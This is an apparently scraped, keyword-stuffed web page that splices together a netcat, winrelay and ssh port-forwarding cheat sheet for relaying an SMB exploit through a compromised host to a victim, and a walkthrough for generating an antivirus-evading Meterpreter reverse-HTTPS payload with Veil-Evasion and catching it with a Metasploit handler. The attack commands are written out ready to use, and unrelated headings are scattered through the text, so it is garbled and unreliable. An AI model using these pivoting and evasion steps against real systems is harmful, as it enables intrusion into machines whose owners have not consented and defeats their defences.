Ssh Metasploit



Discussions and solutions to the most common problems people run into when developing or delivering exploits with Metasploit. A payload is a piece of code to be executed through a said exploit. Have a look at the Metasploit Framework. It is simply a collection of exploits. Any and all resources related to metasploit on this wiki MSF - on the metasploit framework generally. Category:Metasploit - pages labeled with the 'Metasploit' category label. MSF/Wordlists - wordlists that come bundled with Metasploit. MSFVenom - msfvenom is used to craft payloads. Meterpreter - the shell you'll have when you use MSF to craft a remote shell payload. The SSH server support SSH version 1 clients. Version 1 of the SSH protocol contains fundamental weaknesses which make sessions vulnerable to man-in-the-middle attacks. Since all modern SSH clients have supported SSH v2 for at least 5 years, there is no reason to support SSHv1.

NETCAT as Port Forwarder / TCP Relay

[attacker machine]———> [compromised Host] ——–> [ VICTIM ]
root@compromised-host # nc -n -v -l -p 80 0 < backpipe | nc p.q.r.2 445 1 > backpipe

root@attackers-box # ./smb-exploit p.q.r.1 80

The local TCP port 80 of the compromised host is forwarded to the VICTIM’S TCP port 445.

Port Forwarding using winrelay
If the compromised machine is a windows box we can also use winrelay or fpipe
D:> winrealy.exe -lip p.q.r.1 -lp 80 -dip p.q.r.2 -dp 445 -proto tcp
Metasploit Meterpreter also has a port forwarding feature.
-L = The local IP address where the listening port will bind
-r = the remote host
root@compromised-host # ssh -f -N -R 80:p.q.r.2:445 root@a.b.c.d

I am a big fan of using meterpreter as a post compromise payload. It has so many tools that makes all the next steps so much easier. The problem is, every antivirus out there will catch meterpreter. Metasploit comes with a handy obfuscator, but even that always gets caught now.

For a long time, everyone had their tricks to obfuscate meterpreter payloads, but nobody wanted to share for fear of antivirus companies finding out about them. My trick was to generate a raw, shellcode payload. Then use a python script called shellcode2exe that converted the shellcode to an executable file (it used mingw32). When that quit working, I found the Veil Framework. This post will focus on the Veil-Evasion part of the Veil framework.

The authors of Veil took all of the neat obfuscation tricks they could find, and packaged them up into one, easy to use python script.

Setup Your Testbed

The victim machine needs to be any Windows machine. In this example, we’ll be using Windows 7 64-bit. Install an antivirus to see how well it (doesn’t) catch the payload.

The attacker machine should be a machine running Kali Linux. Veil is not installed by default, but there are two easy ways to do it: by running apt-get or simply downloading from the Git repository. Some users have issues with the apt-get method and the git repository will be the most up to date version, so that is my preferred method.

Ssh Metasploit

Apt-get method:

# apt-get install veil
# cd /usr/share/veil-evasion/setup/
# ./setup.sh

Ssh

Git method:

$ git clone https://github.com/Veil-Framework/Veil-Evasion.git
$ cd Veil-Evasion/setup/
$ ./setup.sh

The setup.sh process can take a while. The end result is a Veil-Evasion.py program you can use.

Attack

How do you find a vulnerable host?

Ssh

This post is strictly about post exploitation and antivirus evasion. Find your own way in to a Windows machine. Once you are there, you should be able to run meterpreter, with or without antivirus being installed

Metasploit ssh version

How do you attack that host?

First, use veil to generate the payload. Run the Veil-Evasion.py script from wherever you did your git pull.

Currently there are 40 options for payloads (but the authors frequently/monthly add more). The “list” command will show all the options available.

Different payloads can be used slightly differently. For example, the powershell payloads have the benefit of just being loaded into memory rather than the hard disk as described in a previous blog post. Different versions compiled versions (like the C or C# ones) may or may not be caught by your antivirus of choice (not all will evade antivirus completely), but most likely there will be a couple that work.

In this example, I will generate a payload for #9, or cs/meterpreter/rev_https. The command is “use cs/meterpreter/rev_https” (or just “use 9”)

Finally, I’m going to set the LHOST to the IP address of my Kali machine and then generate the resulting payload. When it asks, I told it to call the payload “colesec”.

Telnet Metasploit

Now take the compiled colesec.exe payload and drop it on the victim machine. Before running it though, start up the meterpreter handler in metasploit. Veil makes this really easy by creating a handler file.

Metasploit Ssh Version

# msfconsole -r /usr/share/veil-output/handlers/colesec_handler.rc

Once metasploit loads up, go ahead and run the executable on the victim machine. It should all work!

Openssh 4.7p1 Debian 8ubuntu1 Vulnerability

Note that Veil has more parts to the framework than just Veil-Evasion. Check out some of the other modules, especially Veil-Catapult for payload delivery.





Comments are closed.